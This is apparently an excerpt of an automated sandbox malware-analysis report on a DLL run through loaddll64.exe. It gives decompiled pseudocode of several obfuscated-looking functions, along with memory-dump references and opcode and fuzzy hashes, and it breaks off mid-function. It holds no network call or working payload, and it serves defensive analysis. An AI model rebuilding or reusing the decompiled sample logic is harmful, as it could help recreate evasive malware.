                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: FileModuleName_invalid_parameter_noinfo
                                • String ID: C:\Windows\system32\loaddll64.exe
                                • API String ID: 3307058713-3772592933
                                • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction ID: 7084bbd1c2dbe938e4b6161fd7881040c3d3f0c8cf2092391de03705d42cb1b7
                                • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction Fuzzy Hash: 8741C532B08E6A8AFB14DF2AE9400BD67E4EF44BA8B544035E94D27795DE3CE461C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F0CF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: @
                                • API String ID: 3000768030-2766056989
                                • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction ID: 6415c3513bfa0acc29d9b14b9bef021f32f128830bf2c6f512498d681071529e
                                • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction Fuzzy Hash: B621F922A08F6A42FB64CB259D9013826D5EF45778F240375D6AE277D4CE3DE891D310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E11F0 Relevance: 4.7, APIs: 3, Instructions: 157memoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 23%
                                			E00007FFC7FFC130E11F0(void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long __r14, intOrPtr _a8, void* _a16, void* _a24, long long _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a88, long long _a96, intOrPtr _a104) {
				void* _v32;
				void* _v40;
				intOrPtr _v48;
				long long _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				void* __rbx;
				intOrPtr _t78;
				void* _t99;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t113;
				void* _t119;
				signed long long _t126;
				void* _t130;
				long long _t133;
				signed long long _t140;
				void* _t151;
				signed long long _t159;
				void* _t164;
				long long _t171;

				_t119 = _t151;
				r11d = _a88;
				_t171 = _a96;
				r11d = r11d + 0xfffff8a0;
				 *((long long*)(_t119 + 0x10)) = __rbp;
				 *((long long*)(_t119 + 0x18)) = __rsi;
				 *((long long*)(_t119 - 0x20)) = __r13;
				r13d = __rcx - 0x3a59;
				 *((long long*)(_t119 - 0x28)) = __r14;
				r14d = __r8 - 0x1044;
				r8d = _a104;
				r8d = r8d + 0xffffdefd;
				_a8 = __rdx - 0xfd2;
				_a88 = r11d;
				_a104 = r8d;
				if (r8d - __rcx + 0xf35 >= 0) goto 0x130e130e;
				 *((intOrPtr*)(_t171 + 0x98)) =  *((intOrPtr*)(_t171 + 0x368));
				r11d = __r8 + 0x329d;
				r10d = __r13 + 0x27b2;
				_v48 = r10d;
				r8d = __rcx + 0xf35;
				_v56 = _t171;
				_v64 = __rcx + 0xc88;
				_t102 = __r13 + 0x27ae;
				_v72 = _a64 + 0xde3;
				_v80 = r11d;
				r9d = __r14 + 0xd93;
				_v88 = __r13 + 0x3189;
				_v96 = _t102;
				_v104 = __r14 - 0x3c4;
				_t78 = E00007FFC7FFC130F84E0(_t119, _t130, __rsi, __r8, _t164, __r14); // executed
				_t133 =  *((intOrPtr*)(_t171 + 0x348));
				r8d = _t78;
				 *((long long*)(_t171 + 0x158)) = _t133;
				goto 0x130e1428;
				_a40 = _t102;
				r10d = _t102;
				_t108 = _t102;
				if (_t108 != 0) goto 0x130e142f;
				_a32 = __r12;
				r12d = _t133 + 0x2ee;
				r12d = r12d & 0x000023f6;
				asm("o16 nop [eax+eax]");
				if (_t108 == 0) goto 0x130e13c6;
				asm("o16 nop [eax+eax]");
				ReadFile(??, ??, ??, ??, ??);
				if (1 - ( *(_t171 + 0x220) &  *(_t171 + 0xe8)) + 0x1f2c < 0) goto 0x130e1370;
				r10d = _a40;
				r11d = _a88;
				r9d = 0;
				if (r12d > 0) goto 0x130e1406;
				_t159 =  *(_t171 + 0x1b8) ^ 0x00002598;
				if (_t159 == 0) goto 0x130e13fd;
				r14d = r14d | r13d ^ 0x00002032;
				if (1 != _t159) goto 0x130e13f0;
				r9d = r9d + 3;
				_t113 = r9d - r12d;
				if (_t113 >= 0) goto 0x130e13e0;
				r10d = r10d + 4;
				_a40 = r10d;
				if (_t113 == 0) goto 0x130e1340;
				r8d = _a104;
				if (r8d - _a88 + 0xffffef7a < 0) goto 0x130e1503;
				 *(_t171 + 0x198) =  *(_t171 + 0x198) * 0x1873ac2e;
				if ( *((intOrPtr*)(_t171 + 0x158)) == 0) goto 0x130e14a9;
				_t126 =  *(_t171 + 0x1e0) | 0x000038e9;
				 *(_t171 + 0x198) = _t126;
				GetProcessHeap();
				if (_t126 == 0) goto 0x130e14a9;
				_t140 = _t126;
				HeapFree(??, ??, ??);
				_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x40)) + 0x200)) - 0x24c;
				if (_t99 - _t140 > 0) goto 0x130e1503;
				asm("o16 nop [eax+eax]");
				 *((long long*)(_t171 + 0x228)) =  *((intOrPtr*)(_t171 + 0x228)) - 0x2598;
				if (_t99 + 1 - _t140 <= 0) goto 0x130e14e0;
				return r14d + 0x17e6;
			}




























                                0x7ffc130e11f0
                                0x7ffc130e11fb
                                0x7ffc130e1209
                                0x7ffc130e1211
                                0x7ffc130e1218
                                0x7ffc130e121c
                                0x7ffc130e1220
                                0x7ffc130e1224
                                0x7ffc130e1232
                                0x7ffc130e1236
                                0x7ffc130e123d
                                0x7ffc130e1245
                                0x7ffc130e124c
                                0x7ffc130e1259
                                0x7ffc130e1261
                                0x7ffc130e126c
                                0x7ffc130e127f
                                0x7ffc130e1286
                                0x7ffc130e1294
                                0x7ffc130e129b
                                0x7ffc130e12a0
                                0x7ffc130e12a7
                                0x7ffc130e12b2
                                0x7ffc130e12c2
                                0x7ffc130e12c9
                                0x7ffc130e12d4
                                0x7ffc130e12d9
                                0x7ffc130e12e0
                                0x7ffc130e12eb
                                0x7ffc130e12ef
                                0x7ffc130e12f3
                                0x7ffc130e12f8
                                0x7ffc130e12ff
                                0x7ffc130e1302
                                0x7ffc130e1309
                                0x7ffc130e130e
                                0x7ffc130e1315
                                0x7ffc130e1318
                                0x7ffc130e131a
                                0x7ffc130e1320
                                0x7ffc130e1328
                                0x7ffc130e132f
                                0x7ffc130e1336
                                0x7ffc130e1356
                                0x7ffc130e1367
                                0x7ffc130e1391
                                0x7ffc130e13b4
                                0x7ffc130e13b6
                                0x7ffc130e13be
                                0x7ffc130e13c6
                                0x7ffc130e13cc
                                0x7ffc130e13d5
                                0x7ffc130e13e5
                                0x7ffc130e13f2
                                0x7ffc130e13fb
                                0x7ffc130e13fd
                                0x7ffc130e1401
                                0x7ffc130e1404
                                0x7ffc130e1406
                                0x7ffc130e140a
                                0x7ffc130e1412
                                0x7ffc130e1418
                                0x7ffc130e1458
                                0x7ffc130e1469
                                0x7ffc130e147a
                                0x7ffc130e1483
                                0x7ffc130e1489
                                0x7ffc130e1490
                                0x7ffc130e1499
                                0x7ffc130e14a0
                                0x7ffc130e14a3
                                0x7ffc130e14c5
                                0x7ffc130e14d1
                                0x7ffc130e14da
                                0x7ffc130e14e9
                                0x7ffc130e1501
                                0x7ffc130e1511

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Process$FileFreePrivilegeReadRelease
                                • String ID:
                                • API String ID: 194138994-0
                                • Opcode ID: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction ID: 9d81bc32470b191a1162693f1a61b7586ffba95175970f3db8011de9cd3ecde5
                                • Opcode Fuzzy Hash: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction Fuzzy Hash: 3071BC73605BE58AD720CB15E048BEE77A8FB88B88F525035CB5D57B80EB38E551CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EB89C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EB89C(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
				 *0x131241f8 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
				E00007FFC7FFC130EBDF4(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFC7FFC130EC7DC() != 0) goto 0x130eb8cb;
				goto 0x130eb8df; // executed
				E00007FFC7FFC130EE090(_t17); // executed
				if (0 != 0) goto 0x130eb8dd;
				E00007FFC7FFC130EC838(0);
				goto 0x130eb8c7;
				return 1;
			}









                                0x7ffc130eb8b0
                                0x7ffc130eb8b3
                                0x7ffc130eb8b9
                                0x7ffc130eb8c5
                                0x7ffc130eb8c9
                                0x7ffc130eb8cb
                                0x7ffc130eb8d2
                                0x7ffc130eb8d6
                                0x7ffc130eb8db
                                0x7ffc130eb8e4

                                APIs
                                • __isa_available_init.LIBCMT ref: 00007FFC130EB8B9
                                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC130EB8BE
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC130EC7E0
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC130EC7E5
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC130EC7EA
                                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC130EB8D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                • String ID:
                                • API String ID: 3388242289-0
                                • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction ID: 2e6de87951bdce05e13e226305b4458111acbcaf336990c934c9e8c891d01c1f
                                • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction Fuzzy Hash: A2E09240F0CEAF06FD54266211522B81BD00F2532CF210475D8AD722C3CE0D74BAE635
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EA970 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 66%
                                			E00007FFC7FFC130EA970(long long __rax, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long __r12) {
				void* __rbx;
				void* __rbp;
				void* __r13;
				void* __r14;
				void* __r15;
				void* _t109;
				void* _t116;
				void* _t148;
				void* _t149;
				long long _t151;
				signed long long _t154;
				signed long long _t161;
				signed long long _t165;
				void* _t166;
				long long _t167;
				void* _t178;
				void* _t180;
				void* _t181;
				void* _t184;
				void* _t186;
				long long _t188;
				void* _t190;
				void* _t192;
				void* _t194;

				_t151 = __rax;
				_t186 = _t180;
				 *(_t186 + 0x18) = r8d;
				_push(_t161);
				_push(_t178);
				_push(_t190);
				_t181 = _t180 - 0xa0;
				r15d =  *(_t181 + 0x100);
				r14d =  *(_t181 + 0x110);
				r15d = r15d + 0x119f;
				 *((intOrPtr*)(_t181 + 0xd0)) = __rcx - 0x44a;
				r10d = __rax - 0x283;
				 *(_t181 + 0x84) = r15d;
				r13d = __rax + 0x170;
				 *(_t181 + 0x80) = r10d;
				r14d = r14d + 0x9d7;
				 *(_t181 + 0x88) = r14d;
				 *((intOrPtr*)(_t181 + 0x148)) = __rcx - 0x36e7;
				r8d = __rax - 0x16a;
				r9d = __rax + 0xd93;
				 *(_t181 + 0x100) = r8d;
				_t19 = _t161 + 0x2598; // 0x2598
				 *(_t181 + 0x110) = r9d;
				if (r13d - _t19 < 0) goto 0x130eae64;
				 *((long long*)(_t186 + 0x10)) = __rsi;
				 *((long long*)(_t186 - 0x30)) = __rdi;
				 *((long long*)(_t186 - 0x38)) = __r12;
				if (r15d == __r10 - 0x173a) goto 0x130eacf1;
				_t188 =  *((intOrPtr*)(_t181 + 0x130));
				r10d = 0x3a59;
				r9d = r10d;
				 *(_t181 + 0x28) = 0x38e9;
				_t167 = _t188;
				 *(_t181 + 0x20) = r10w;
				r8d = 0x23f6; // executed
				E00007FFC7FFC130E9AC0(_t161, __rcx, _t167, _t178, _t194); // executed
				r11d = _t178 + 0x37e1;
				r9d =  *(_t181 + 0x84);
				r10d = _t194 + 0x4c4;
				r8d = _t190 - 0x14c1;
				 *((long long*)(_t181 + 0x78)) = _t188;
				 *((long long*)(_t188 + 0x340)) = _t151;
				r15d = r15d + 0xfffff21d;
				r9d = r9d + 0xfffff219;
				_t154 =  *((intOrPtr*)(_t188 + 0x198)) + 0x0000329d | 0x0000666a;
				 *(_t188 + 0x28) =  *(_t188 + 0x28) | _t154;
				_t42 = _t161 + 0x27b2; // 0x27b2
				 *(_t181 + 0x110) = _t42;
				 *((intOrPtr*)(_t181 + 0x70)) = _t190 - 0x278;
				r14d = _t190 - 0x17cd;
				 *(_t181 + 0x68) = r10d;
				 *((intOrPtr*)(_t181 + 0x60)) = r11d;
				 *((intOrPtr*)(_t181 + 0x58)) = _t192 + 0x40c;
				 *(_t181 + 0x50) = _t190 - 0x12ab;
				 *((intOrPtr*)(_t181 + 0x48)) =  *((intOrPtr*)(_t181 + 0xe0));
				 *((intOrPtr*)(_t181 + 0x40)) = _t167 + 0x1555;
				 *(_t181 + 0x38) =  *(_t181 + 0x110);
				 *((intOrPtr*)(_t181 + 0x30)) =  *((intOrPtr*)(_t181 + 0xd0)) + 0xfffff515;
				 *(_t181 + 0x28) = r14d;
				 *(_t181 + 0x20) = r15d;
				_t109 = E00007FFC7FFC130F8680( *((intOrPtr*)(_t181 + 0x148)) + 0x30d5, _t161, __rcx, _t167, __rsi, __r8, _t184, __r10, _t188, _t190, _t194); // executed
				r9d = 0x1f2c;
				 *(_t181 + 0x28) = _t161;
				r8d = 0x329d;
				 *(_t181 + 0x20) = 0x343a;
				E00007FFC7FFC130E9AC0(_t161, __rcx, _t188, _t178, _t192); // executed
				 *(_t188 + 0x358) = _t154;
				_t165 =  *((intOrPtr*)(_t188 + 0x1b0)) + _t161;
				 *( *_t188 + 0x1e0) =  *( *_t188 + 0x1e0) | _t165;
				r8d =  *( *((intOrPtr*)(_t188 + 0x40)) + 0x150);
				r8d = r8d ^ 0x000017cd;
				_t148 = r8d - 0x343c;
				if (_t148 >= 0) goto 0x130eabf1;
				_t166 = _t165 - 1;
				if (_t148 != 0) goto 0x130eabe0;
				 *((long long*)(_t188 + 0x198)) =  *((intOrPtr*)(_t188 + 0x198)) + ( *(_t188 + 0xb8) ^ 0x000027b2);
				_t149 =  *((intOrPtr*)( *_t188 + 0x130)) - 0x3c5 - 0x2032;
				if (_t149 >= 0) goto 0x130eac25;
				if (_t149 != 0) goto 0x130eac17;
				 *(_t188 + 0x1b8) =  *(_t188 + 0x1c0) | _t161;
				r10d = _t190 - 0x4c4;
				r8d = _t190 - 0x1a27;
				r11d = _t166 - 0xeb4;
				 *((long long*)(_t188 + 0x158)) =  *((intOrPtr*)(_t188 + 0x140));
				 *((intOrPtr*)(_t181 + 0x58)) = _t190 - 0x8d0;
				r9d = _t166 + 0xefd;
				 *(_t181 + 0x50) = r10d;
				 *((intOrPtr*)(_t181 + 0x48)) = r11d;
				 *((long long*)(_t181 + 0x40)) = _t188;
				 *(_t181 + 0x38) = _t166 + 0x3f3;
				 *((intOrPtr*)(_t181 + 0x30)) = _t166 + 0x13da;
				 *(_t181 + 0x28) =  *(_t181 + 0x110);
				 *(_t181 + 0x20) = _t109 + 0x70c;
				_t116 = E00007FFC7FFC130F9610( *((intOrPtr*)(_t188 + 0x140)), _t161, _t166,  *(_t188 + 0x1c0) | _t161, __r8, _t184, __r10, _t188, _t190, _t192, _t194); // executed
				return _t116 + 0x1086;
			}



























                                0x7ffc130ea970
                                0x7ffc130ea970
                                0x7ffc130ea973
                                0x7ffc130ea977
                                0x7ffc130ea978
                                0x7ffc130ea979
                                0x7ffc130ea97f
                                0x7ffc130ea994
                                0x7ffc130ea9a2
                                0x7ffc130ea9b0
                                0x7ffc130ea9b7
                                0x7ffc130ea9be
                                0x7ffc130ea9c5
                                0x7ffc130ea9cd
                                0x7ffc130ea9d4
                                0x7ffc130ea9e3
                                0x7ffc130ea9ea
                                0x7ffc130ea9f2
                                0x7ffc130ea9f9
                                0x7ffc130eaa00
                                0x7ffc130eaa07
                                0x7ffc130eaa0f
                                0x7ffc130eaa15
                                0x7ffc130eaa20
                                0x7ffc130eaa26
                                0x7ffc130eaa31
                                0x7ffc130eaa35
                                0x7ffc130eaa3c
                                0x7ffc130eaa42
                                0x7ffc130eaa4a
                                0x7ffc130eaa50
                                0x7ffc130eaa53
                                0x7ffc130eaa5c
                                0x7ffc130eaa5f
                                0x7ffc130eaa68
                                0x7ffc130eaa6e
                                0x7ffc130eaa7a
                                0x7ffc130eaa81
                                0x7ffc130eaa89
                                0x7ffc130eaaa5
                                0x7ffc130eaaac
                                0x7ffc130eaab7
                                0x7ffc130eaacd
                                0x7ffc130eaada
                                0x7ffc130eaae1
                                0x7ffc130eaaed
                                0x7ffc130eaaf8
                                0x7ffc130eaafe
                                0x7ffc130eab13
                                0x7ffc130eab17
                                0x7ffc130eab25
                                0x7ffc130eab2a
                                0x7ffc130eab2f
                                0x7ffc130eab33
                                0x7ffc130eab37
                                0x7ffc130eab42
                                0x7ffc130eab46
                                0x7ffc130eab4a
                                0x7ffc130eab4e
                                0x7ffc130eab53
                                0x7ffc130eab58
                                0x7ffc130eab62
                                0x7ffc130eab68
                                0x7ffc130eab6d
                                0x7ffc130eab76
                                0x7ffc130eab82
                                0x7ffc130eab87
                                0x7ffc130eab9b
                                0x7ffc130eab9e
                                0x7ffc130eabaf
                                0x7ffc130eabb6
                                0x7ffc130eabbd
                                0x7ffc130eabc0
                                0x7ffc130eabe3
                                0x7ffc130eabe7
                                0x7ffc130eabe9
                                0x7ffc130eac06
                                0x7ffc130eac08
                                0x7ffc130eac1b
                                0x7ffc130eac1d
                                0x7ffc130eac2c
                                0x7ffc130eac3b
                                0x7ffc130eac48
                                0x7ffc130eac6c
                                0x7ffc130eac7b
                                0x7ffc130eac7f
                                0x7ffc130eac94
                                0x7ffc130eac99
                                0x7ffc130eac9e
                                0x7ffc130eaca9
                                0x7ffc130eacb3
                                0x7ffc130eacb7
                                0x7ffc130eacbb
                                0x7ffc130eacbf
                                0x7ffc130eacf0

                                APIs
                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00002103,-00000CDF), ref: 00007FFC130EAD58
                                  • Part of subcall function 00007FFC130E9AC0: GetProcessHeap.KERNEL32(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B22
                                  • Part of subcall function 00007FFC130E9AC0: RtlAllocateHeap.NTDLL(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$AllocateObjectProcessSingleWait
                                • String ID: 8
                                • API String ID: 4287835514-406019892
                                • Opcode ID: 8cafa0d41ea4863b1c047ae8c992af8925c9c6a1007ade65a18b741fcc31d67f
                                • Instruction ID: d47ef9f54ede6cd88deb67ca670bec40e913a87a435673d09aef5d168ee4430d
                                • Opcode Fuzzy Hash: 8cafa0d41ea4863b1c047ae8c992af8925c9c6a1007ade65a18b741fcc31d67f
                                • Instruction Fuzzy Hash: E3D188736086D48BD721CF14E484BDABBA8F788798F040139DB8957B58DB38EA95CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F84E0 Relevance: 3.1, APIs: 2, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapPrivilegeProcessRelease
                                • String ID:
                                • API String ID: 2757213858-0
                                • Opcode ID: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction ID: 5f73246556db8f551803a434a2abb52e996455873a44691966bc438cbf73c2a4
                                • Opcode Fuzzy Hash: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction Fuzzy Hash: B941D272609F9987DB58CB14E5807E9B7A4F784B88F084235DB8D57B44EF38D6A5C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E9AC0 Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130E9AC0(long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {

				_a16 = __rbx;
				_a24 = __rbp;
				r8d =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1a0)) + 0xb0));
				r8d = r8d - 0x27b3;
				if ( *((intOrPtr*)(__rdx + 0x158)) != r8d) goto 0x130e9b07;
				return 0;
			}



                                0x7ffc130e9ac0
                                0x7ffc130e9ac5
                                0x7ffc130e9ae2
                                0x7ffc130e9ae9
                                0x7ffc130e9af3
                                0x7ffc130e9b06

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID:
                                • API String ID: 1357844191-0
                                • Opcode ID: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction ID: 416bdeb696cee8df0479d703f5e23b7e69f67396b7a46ea3df2999aaeb1c8561
                                • Opcode Fuzzy Hash: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction Fuzzy Hash: CE118672719B9086EA49CB62E8842AEA3A0F78CBD4F584135DF4D53B49CF38D5A08700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C40F8 Relevance: 2.6, APIs: 2, Instructions: 131memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: b049db5660b9aacd0cd17634e525d4f8cbccc83e5e1fd047ea57d6b67e4dd2ee
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 7E519E72A04BA0D7D764CF05F84AB9EB7A8F784B94F514115EF8943B59DB39C8A0CB08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C5FC8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 29%
                                			E00000201201640C5FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
				long long* _t32;
				long long* _t35;
				long long _t41;
				void* _t56;
